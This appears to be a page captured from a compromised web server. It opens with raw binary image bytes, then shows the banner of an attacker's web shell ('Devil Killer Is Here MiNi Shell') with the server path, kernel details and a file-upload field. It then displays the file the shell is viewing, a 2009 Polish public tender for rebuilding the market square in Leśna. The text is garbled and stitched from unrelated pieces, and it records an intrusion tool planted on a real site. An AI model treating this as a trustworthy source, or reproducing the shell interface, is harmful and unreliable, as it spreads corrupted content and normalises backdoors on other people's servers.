JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090209/35411-N-2009.html

<p class="kh_header"><b>Leśna: Przebudowa ulicy Rynek wraz z infrastrukturą w Leśnej</b><br>
<b>Numer ogłoszenia: 35411 - 2009; data zamieszczenia: 09.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Leśna , Rynek 19, 59-820 Leśna, woj. dolnośląskie, tel. 075 7211239, faks 075 7242368.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Rynek wraz z infrastrukturą w Leśnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
Przedmiotem planowanej inwestycji jest przebudowa nawierzchni placu z zastosowaniem kostki granitowej i płyt granitowych, ze zmianą zagospodarowania  terenu wraz z budową oświetlenia, odwodnienie terenu placu poprzez budowę przyłączy studzienek deszczowych oraz elementów małej architektury w obrębie placu Rynek i ulic przyległych. Projektowana inwestycja jest przebudową nawierzchni placu i ulic w zakresie:
­-rozebranie istniejącej nawierzchni z asfaltu wraz z kostką granitową i podbudową,
­-wycięcia drzew i krzewów oraz likwidacja trawników z murkami oporowymi
­-wykonanie nowej podbudowy i przyłączy studzienek deszczowych kanalizacji deszczowej, 
­-podniesienie studzienek i włazów kanalizacji i telekomunikacji z wymianą pokryw nastudziennych i wymianą hydrantów,
­-wykonanie nowej nawierzchni z płyt granitowych, kostki granitowej, nawierzchni asfaltowej,
­-odtworzenie zabytkowej studni miejskiej
­-wykonanie i montaż elementów małej architektury tj. schody kamienne, ławki, kosze na śmieci, tablice informacyjne,
­-wykonanie nowej zieleni urządzonej - kwietniki, krzewy ozdobne, drzewka ozdobne.

ISTNIEJĄCY STAN ZAGOSPODAROWANIA TERENU

Terenem planowanej inwestycji jest plac Rynek w Leśnej oraz częściowo ulice przylegające bezpośrednio do rynku.  Jest to wewnętrzny plac w zabudowie zwartej z budynkiem Ratusza w centrum placu. Przez plac przebiega droga gminna pomiędzy ulicami Lubańską, Świerczewskiego, Szkolną i Sienkiewicza.
Plac posiada nawierzchnię z asfaltobetonu oraz płyt i kostki betonowe z dużą ilością murków kamiennych oraz zieleni w postaci krzewów. Teren częściowo wyłączony jest z ruchu samochodowego.
Droga posiada nawierzchnię z asfaltobetonu oraz chodniki z asfaltu i częściowo z płyt betonowych. 
Bilans terenu:
­	powierzchnia opracowania	3.972 m2
­	powierzchnia działki nr 782	3.700 m2
­	powierzchnia części działek nr 750/2, 773/2, 765, 794/2, 796/4, 743/2	272 m2
­	powierzchnia drogi gminnej	536 m2
­	powierzchnia terenów zielonych	25 m2
­	powierzchnia parkingu	157 m2
­	powierzchnia wykonana z koski granitowej	3254 m2

3. PROJEKTOWANE ZAGOSPODAROWANIE TERENU

W projekcie założono reorganizację przestrzeni poprzez nowe zagospodarowanie płyty rynku, którego cała płaszczyzna będzie otwarta bez elementów kubaturowych i przestrzennych.
W rysunek nawierzchni płyty podkreślone zostały takie elementy jak przebieg murów dawnego ratusza, lokalizację studni oraz przebieg historyczny ulicy wewnętrznej.
Plac został podzielony na dwie części: 
- plac wewnętrzny, przylegający do Ratusza
- drogę łączącą ulice z placem wzdłuż pierzei wschodniej, zewnętrzny
Nawierzchnię ulicy zaprojektowano z kostki kamiennej granitowej w układzie segmentowym pozostałą część placu wewnętrznego zaprojektowano z kostki ułożonej rzędowo oraz w układzie kołowym i rybią łuskę. 
Nawierzchnię zaprojektowano z płyt granitowych groszkowanych w kolorze jasno szarym i czerwonym oraz z kostki granitowej z jedną płaszczyzną ciętą groszkowaną w kolorze jasno szarym, rudo szarymi i czarnym. 

 PROJEKTOWANE PRACE BUDOWLANE

Rozbiórka elementów nawierzchni. Obiekty znajdujące się w pasie robót drogowych nie przeznaczone do usunięci powinny być przez Wykonawcę zabezpieczone przed uszkodzeniem. Roboty rozbiórkowe obejmują zerwanie nawierzchni z asfaltobetonu wraz z nawierzchnią z kostki betonowej, następnie należy zerwać nawierzchnię z kostki granitowej brukowej pozostawionej pod asfaltem. Na powierzchni placu gdzie nie były prowadzone wykopy pod instalacje zdjąć górną warstwę podbudowy o grubości 15 cm. Elementy możliwe do powtórnego wykorzystania powinny być usuwane bez powodowania zbędnych uszkodzeń.
Podbudowa. Na całej szerokości placów oraz jezdni należy wykonać podbudowę warstwy nośnej z kruszywa łamanego i miału kamiennego. Grubość rozłożonej warstwy luźnego kruszywa powinna być taka aby po zagęszczeniu i zaklinowaniu osiągnięto wymaganą grubość warstwy 30 cm. Zagęszczenie podbudowy powinno rozpoczynać się od osi jezdni w kierunku budynków a wewnątrz placu od poziomu najniższego w kierunku budynków. 
Profilowanie podłoża. Przed przystąpieniem do profilowania podłoże powinno być oczyszczone z wszelkich zanieczyszczeń. Po oczyszczeniu powierzchni podłoża należy sprawdzić czy istniejące rzędne terenu umożliwią uzyskanie po profilowaniu zaprojektowanych rzędnych. 
Podłoże w miejscach prowadzonych wykopów należy dogęścić przez wałowanie zagęszczarką wibracyjną. 
Nawierzchnia placu. Do wykonania nawierzchni placu zastosowano kostkę kamienną granitową i płyty granitowe o wysokości 8 cm. 
Szczeliny dylatacyjne poprzeczne należy stosować co 10-15m oraz w takich miejscach, w których występuje zmiana sztywności podłoża. Kostka po ułożeniu powinna być dobrze ubita, kostki pęknięte powinny być wymienione na całe.
Układanie kostki kamiennej należy rozpocząć nie wcześniej niż po zakończeniu i odebraniu wszelkich robót związanych układaniem, montowaniem i instalowaniem wszelkich instalacji podziemnych jak również elementów małej architektury.
Kostkę należy układać powyżej zakładanego poziomu o 3-4 cm, następnie należy ubijać kostkę dwukrotnie. Pierwsze ubicie wykonać przed wypełnieniem spoin, stosując polewanie kostki wodą. Drugie ubicie lub wibrowanie wykonać po zasypaniu szczelin podsypką, w trakcie ubijania uzupełnić wypełnienie szczelin podsypką z polewaniem wodą.
Ścieki. Ścieki uliczne należy wykonać z kostki rzędowej kamiennej granitowej o wysokości 16 cm na podsypce cementowo - piaskowej o grubości po zagęszczeniu 10 cm. Wykonanie ścieku powinno być z dwóch rzędów.
Ulica wewnętrzna. Zgodnie z ustaleniami z zarządcą drogę gminną  zaprojektowano jako jednojezdniową o szerokości 6,0 m. 
Konstrukcję jezdni zaprojektowano zgodnie z pkt. 5.3.2.b załącznika nr 5 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z 2 marca 1999 w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U Nr 43 poz. 430). 
z betonu B-15.  Wysokość krawężnika nad kostką - 8 cm, wysokość krawężnika nad pozostałą jezdnią zgodnie z rysunkami architektonicznymi. Na przejściach dla pieszych projektuje się ułożenie krawężników wtopionych. W ramach projektu przewidziano także regulację urządzeń obcych (kapy zaworów wodnych i gazowych, krat deszczowych, włazów kanałowych oraz studni telekomunika-cyjnych). Projekt przewiduje także wymianę istniejących krat deszczowych  na nowe - uchylne w przekładką elastomerową; włazów studni deszczowych - na włazy z wypełnieniem z kostki granitowej, wentylowane z wkładką tłumiącą i zabezpieczeniem przed obro-tem; włazów studni kanalizacji sanitarnej - na włazy z wypełnieniem kostką granitową, pełne, z wkładką tłumiącą i zabezpieczeniem przed obrotem. Zaprojektowano także wymianę istniejących uszkodzonych kap zaworów wodnych i gazowych oraz pokryw studni telekomunikacyjnych. Pokrywy studzienek telekomunikacyjnych należy ujednolicić stosując typowe obudowy z wypełnieniem kostką granitową. Wszystkie wymieniane elementy armatury sieci zewnętrznych powinny posiadać  klasę D-400 (lub wyższą) oraz sto-sowne aprobaty techniczne IBDiM.
Projektowana nawierzchnia placu ul. Rynek 
Ze względu na położenie placu pomiędzy zabudową śródmiejską nie projektuje się jezdni ani chodników. Nawierzchnię zaprojektowano jako jednoprzestrzenną bez krawężników, na całej szerokości pomiędzy budynkami. Zgodnie z wytycznymi Konserwatora Zabytków w miejscu historycznej lokalizacji studni miejskiej zaprojektowano odbudowe stylizowanej obudowy studni wraz z eksploracją pozostałości studni poniżej poziomu posadzki i jej odtworzenia jako obiektu architektonicznego. Układ zaprojektowanych wzorów pokazany na rysunkach architektonicznych podkreśla historyczny układ ulic oraz placów.
5. PROJEKTOWANE ELEMENTY MAŁEJ ARCHITEKTURY
Studnia miejska. Po dokonaniu odkrywki archeologicznej studni miejskiej należy dokonać eksploracji jej szybu a następnie wykonać prace renowacyjne ocembrowania i odtworzyć jako stylizowaną obudowę studni. Ze względu na bezpieczeństwo zaprojektowano została osłona szybu studni ze szkła bezpiecznego. Zaprojektowano zastosowanie podświetlenia szybu z wewnątrz studni podłączone do systemu oświetlenia placu. 
Kratki piwniczne. Poziome zabezpieczenie pośredniego doświetlenie piwnic wykonać ze stalowych płaskowników (6x30) o wymiarach dostosowanych do miejsca zamontowania. Kratę należy ułożyć na specjalnie przygotowanym kamiennym krawężniku z zaciętym profilem, umożliwiającym zlicowanie powierzchni kraty z nawierzchnią chodnika. Na ścianach okienek piwnicznych należy wykonać żelbetowe wieńce jako podbudowa pod kamienne obramowanie. 
Postument. Projekt wskazuje lokalizację postumenty pod lokalizacje dzwonu z wieży ratuszowej
Obudowa drzew. Zaprojektowana została obudowa drzew w formie siedziska z bloków granitowych, oraz w formie obramowania drzew krawężnikiem ciętym z łuku z zamocowana kratą ozdobną odlewaną z żeliwa.
Elementy architektoniczne jak: ławki, źródełko słupek, pachołki, tablica i kosze wybrane zostały z katalogu firmy art. metal (www.art.-metal.pl). Elementy te zostały wybrane jako możliwe do zastosowania.      
Elementy architektoniczne:
- ławki - boki wykonane z odlewów żeliwnych, całość zabezpieczona antykorozyjnie w celu zabezpieczenia ławki przed przesunięciem w stopach nóżek wykonać otwory na śruby mocujące ławkę do podłoża, listwy  z drewna twardego malowane bejcą z lakierem w kolorze machoń,  
- pachołki - konstrukcja słupków stalowa z elementami dekoracyjnymi żeliwnymi, część dolna z możliwością do zabetonowania,
- tablica - słupki żeliwne w podstawie zalany pręt zbrojeniowy do posadowienia słupków, plansza z tworzywa umożliwiającego mocowanie informacji, obudowa planszy metalowo żeliwna ozdobna,
- kosze na śmieci - słupki żeliwne z możliwością demontażu kosza, podstawa słupka zabetonowana w posadzkę,
- latarnia parkowa - słup latarni i korona żeliwne, oprawy oświetleniowe - tworzywo odporne na uderzenie (nietłukące się)
- latarnia stylizowana uliczna - słup konstrukcji stalowo - żeliwnej zabezpieczony antykorozyjnie, korona z rury z elementami ozdobnymi żeliwnymi oraz podwieszane oprawy z systemem daszków ozdobnych wykonanych z metali nierdzewnych,
- osłony drzew - kraty żeliwne ozdobna.     
Zieleń.                                                                                  
W projekcie założono reorganizację przestrzeni poprzez nowe zagospodarowanie tj likwidację różnego rodzaju murków kamiennych.
Należy wyciąć jedno drzewo iglaste oraz krzewy znajdujące się przy budynku Ratusza.
Projekt wyznacza lokalizację nasadzenia nowych drzew liściastych na placu oraz zaprojektowano nowy układ zieleńców
 SIEĆ WODOCIĄGOWA I KANALIZACJA DESZCZOWA
Kanalizacja   deszczowa   . 
 Kanalizację deszczową projektuje się z rur i kształtek kanałowych z PVC o połączeniach  kielichowych - rodzaj P - wciskowych na uszczelkę gumową. Uszczelki dostarcza  producent wraz z rurami . Projektuje się przyłącza kanalizacji deszczowej od projekto-wanych wpustów do studzienek   z rur o średnicy  DN 160 mm. Projektowane wpusty  z kręgów betonowych  500 mm.  Na połą-czeniu ze studzienkami kanalizacyjnymi o konstrukcji betonowej stosować przejścia szczelne z PVC typu kielichowego z uszczelnieniem gumowym , analogicznym jak dla złącz kielichowych rur . Połączeń bosych rur ze sobą wykonywać za pomocą złączki dwukielichowej . Każdy koniec rury do wciśnięcia w kielich następnej , powinien posiadać znak określający głębokość wcisku - granicę wprowadzenia. Dla rur o średnicy DN 160 mm  minimalna granica wprowadzenia powinna wynosić 100 mm.
Sieć i przyłącza wodociągowe. 
Sieć wodociągową projektuje się z przewodów o średnicy 125 mm PE-HD SDR 11 w układzie pierścieniowym.
Na połączeniach projektowanej sieci wodociągowej projektuje się węzły montażowe pozwalające na odcinanie poszczególnych od-cinków sieci.
Przyłącza  wodociągowe  projektuje się z polietylenu PE-HD o średnicy dn 40 mm.   
Wpięcie do przewodu rozdzielczego poprzez opaskę do nawiercania HACOM   nr kat. 3370 HAWLE z odejściem gwintowanym 2:.  Na kombinacyjnej  zasuwie do nawiercania ISO DN 1 zamontować obudowę teleskopową do zasuwy  -   HAWLE  - przykrycie 1.30-1.80 m. Na obudowie teleskopowej zabudować skrzynkę uliczną do zasuw -sztywna-  wykonanie ciężkie  , nr kat. 1650 HA-WLE- obetonowanej do poziomu terenu w którym będzie  umieszczona. 
Na sieci wodociągowej projektuje się 4  podziemne hydranty ppoż. Dn 80 typu  DUO Kramer 250.1
Połączenie hydrantu z siecią wykonać zgodnie z rys. nr 10.
Nad rurociągiem umieścić taśmę znakującą w kolorze niebieskim (z wkładką metalową). 
Układanie rury PE po łuku należy wykonać z zachowaniem promienia gięcia zalecanego przez producenta rury - dla danej temperatury zewnętrznej.
Wszystkie materiały i armatura użyta do budowy przyłącza wodociągowego powinna posiadać odpowiednie atesty i świadectwa dopuszczenia - w tym PZH do wody pitnej.
 0ŚWIETLENIE PLACU 
Zasilanie oświetlenia Zgodnie z wydanymi warunkami z Rejonem Energetycznym Lubań oświetlenie placu będzie zasilane z istniejącego złącza kablowego zabudowanego na ścianie budynku ratusza. Szafka oświetleniowa SO, zlokali-zowana przy budynku Rynek 19, zasilana będzie kablem typu YAKY 5 16 mm2 z istniejącego złącza kablowego.
Szafka oświetleniowa SO
W szafce należy zabudować liczniki dwustrefowe energii czynnej C52cd 3 230/400V 10(40)A (pomiar bezpośredni). Zastosować typową obudowę szafki z tłoczywa poliestrowo-szklanego termoutwardzalnego z fundamentem. Szafkę należy przystosować do zamykania zamkiem patentowym typu Łucznik. W drzwiczkach szafki, na wysokości liczydeł licznika, należy wyciąć otwory celem umożliwienia odczytu. Załączanie oświetlenia odbywać się będzie automatycznie z zastosowaniem cyfrowego programatora astronomicznego typu CPA 3.1 .
Zabezpieczenia przedlicznikowe w szafkach stanowić będą wyłączniki typu 3 S311C 100A .
Szyny ochronne w szafce oświetleniowej należy połączyć z żyłami ochronnymi PE kabli zasilających oświetlenie.
Zasilanie latarń oświetleniowych
Zasilanie oświetlenia odbywać się będzie z szafki oświetleniowej kablami typu YAKY 5 16 mm2 . 
Kable na całej długości ułożyć w rurach ochronnych PEHD typu DVK 75. Trasy kabli oznaczyć betonowymi oznacznikami. Na ka-ble nałożyć opaski kablowe z podaniem typu kabla, przekroju żył, napięcia i roku ułożenia. Przy latarniach i szafkach oświetleniowych pozostawić zapasy kabli po 1,5 m.
Ze względu na dużą gęstość uzbrojenia podziemnego (rury gazowe, wodne, kanalizacyjne oraz kable telefoniczne i energetyczne), wszelkie prace ziemne należy prowadzić ręcznie z zachowaniem ostrożności.
 Słupy i oprawy oświetleniowe
Dobór latarń oświetleniowych, tj. słupów i opraw, został uzgodniony i zaakceptowany przez Inwestora.
Do oświetlenia placu ul. Rynek wykorzystane zostaną następujące latarnie :
1.	oprawy oświetleniowe typu Arier o mocy 50W zabudowane na słupie ST3/94
2.	oprawy oświetleniowe typu Andromeda o mocy 150 W zabudowane na słupie D15/06
Powyższe zestawy producent dostarcza jako kompletne, wyposażone w tabliczkę bezpiecznikową i przewody. 
Słupy te należy mocować na prefabrykowanych fundamentach betonowych. 
Oprawy należy podłączać do przewodów poszczególnych faz, jak pokazano na schematach sieci. 
Słupy oświetleniowe i oprawy połączyć z żyłą ochronną PE kabla zasilającego latarnie.
 Demontaż istniejącego oświetlenia
Istniejące latarnie należy zdemontować łącznie z zasilającymi je kablami. 
Wszystkie materiały z demontażu przekazać do Rejonu Energetycznego w  Lubaniu.

Szczegółowy zakres opracowania z przedmiarem robót  oraz rysunkami zawiera specyfikacja techniczna stanowiąca część II SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.23.31.20-6, 45.31.61.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości: 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (Dz. U. z 2007 roku Nr 223 poz. 1655 raz z 2008 r. Nr 171, poz. 1058), tzn.:
1)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posia-dania takich uprawnień;
2)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5)	Wniosą wadium,
6)	Udzielą gwarancji na okres co najmniej 60 m-cy od dnia zakończenia robót..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych składa następujące dokumenty:

A.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
A.2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
A.3) Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
A.4) Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym a art. 24 ust. 1 pkt. 4-8 ustawy, wysta-wionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
A.5) Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
A.4) Oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Ustawy Prawo Zamówień Publicznych. 

B.	W celu potwierdzenia spełnienia warunku posiadania  przez wykonawcę niezbędnej wiedzy i doświadczenia  oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 

B.1) wykaz robót budowlanych potwierdzający wykonanie co najmniej jednej roboty w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania - dróg, chodników, ciągów pieszych, parkingów lub placów publicznych wykonanych z kostki brukowej (kamiennej lub betonowej) na powierzchni co najmniej 3.500 m2, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem zakresu, wartości, przedmiotu, dat i miejsca wykonania i zamawiającego oraz załą-czenie dokumentów potwierdzających, że roboty te zostały wykonane należycie (referencje), 
B.2) wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wyko-nawca, tj. co najmniej  następujący sprzęt: 
- walec statyczny  samojezdny 		- 1 szt.
- samochód samowyładowczy 5t 	        - 2 szt.
- sprężarka powietrza spalinowa 4-5m3/min - 1 szt.
- zagęszczarka wibracyjna 		- 2 szt.
- samochód skrzyniowy 		- 1 szt.
B.2a) pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urzą-dzeń, jeżeli w wykazie, o którym mowa wyżej, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,
B.3) wykaz osób, którymi dysponuje lub będzie dysponował  wykonawca i które będą uczestniczyć  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wyko-nania zamówienia, a także zakresu wykonywanych przez nich czynności, 
B.3a) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa wyżej, wykonawca wskazał osoby, którymi będzie dysponował, 
B.4) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień: 
1) kierownik budowy musi posiadać odpowiednie uprawnienia budowlane określone przepisami prawa budowlanego i wykazać się co najmniej 2 - letnią praktyką  na budowie przy zabytkach nieruchomych,
2) Wykonawca zobowiązany jest prowadzić roboty pod kierownictwem  osób  posiadających uprawnienia do prowadzenia robót w następujących odpowiednich (wymaganych) dla tego typu robót specjalnościach:
- elektrycznej,
- wod - kan,
- drogowej
w/w osoby muszą posiadać aktualne zaświadczenia z właściwej Izby Samorządu Zawodowego potwierdzające przynależność tych osób do Izby.  
B.5) Oświadczenie kierownika  budowy o przyjęciu funkcji w przypadku wyboru oferty.
B.6) Harmonogram rzeczowo-finansowy robót z wyszczególnieniem zakresu robót, terminem wykonania oraz planowymi płatnościami (dwie płatności przejściowe oraz jedna płatność końcowa).
C. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:

C.1) informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie mniejszą niż 1.000.000,00 PLN (jeden milion złotych), wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,  
C.2)  polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowie-dzialności cywilnej w zakresie prowadzonej działalności.
